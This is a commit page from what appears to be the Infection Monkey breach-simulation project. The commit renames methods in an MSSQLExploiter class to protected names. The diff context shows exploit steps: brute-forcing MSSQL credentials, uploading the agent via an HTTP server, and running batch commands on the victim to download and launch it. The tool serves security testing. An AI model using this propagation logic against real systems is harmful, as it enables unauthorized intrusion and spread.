p15670423
/
monkey
1
0
Fork 5
Code Issues Pull Requests 3 Projects Releases Wiki Activity

Agent: Prefix protected methods in MSSQLExploiter with "_"

This commit is contained in:
Mike Salvatore 2022-06-14 14:27:21 -04:00
parent 62cc401981
commit 0204ba6343
1 changed files with 12 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -58,7 +58,7 @@ class MSSQLExploiter(HostExploiter):
self.options["credentials"]["exploit_password_list"],
)
try:
self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds)
self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds)
except FailedExploitationError:
logger.info(
f"Failed brute-forcing of MSSQL server on {self.host},"
@ -72,15 +72,15 @@ class MSSQLExploiter(HostExploiter):
try:
# Create dir for payload
self.create_temp_dir()
self._create_temp_dir()
http_thread = self.start_monkey_server(monkey_path_on_victim)
self.upload_monkey(monkey_path_on_victim)
http_thread = self._start_monkey_server(monkey_path_on_victim)
self._upload_monkey(monkey_path_on_victim)
MSSQLExploiter._stop_monkey_server(http_thread)
self.run_monkey(monkey_path_on_victim)
self.remove_temp_dir()
self._remove_temp_dir()
except Exception as e:
error_message = (
f"An unexpected error occurred when trying "
@ -95,13 +95,13 @@ class MSSQLExploiter(HostExploiter):
self.exploit_result.propagation_success = True
return self.exploit_result
def create_temp_dir(self):
def _create_temp_dir(self):
logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}")
mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}"
self._run_mssql_command(mkdir_command)
def upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
def _upload_monkey(self, monkey_path_on_victim: PureWindowsPath):
self._write_download_command_to_batch_file(monkey_path_on_victim)
self.run_payload_file()
@ -131,21 +131,21 @@ class MSSQLExploiter(HostExploiter):
self.run_payload_file()
def _write_agent_launch_command_to_batch_file(self, monkey_path_on_victim):
agent_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
agent_launch_command = self._get_monkey_launch_command(monkey_path_on_victim)
self._write_command_to_batch_file(agent_launch_command)
def get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
def _get_monkey_launch_command(self, monkey_path_on_victim: PureWindowsPath):
monkey_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim
)
return f"{monkey_path_on_victim} {DROPPER_ARG} {monkey_args}"
def remove_temp_dir(self):
def _remove_temp_dir(self):
self._run_mssql_command(f"del {self.payload_file_path}")
self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}")
def start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
def _start_monkey_server(self, monkey_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, str(monkey_path_on_victim), self.agent_repository
)
@ -156,7 +156,7 @@ class MSSQLExploiter(HostExploiter):
http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT)
def brute_force(self, host, port, users_passwords_pairs_list):
def _brute_force(self, host, port, users_passwords_pairs_list):
"""
Starts the brute force connection attempts and if needed then init the payload process.
Main loop starts here.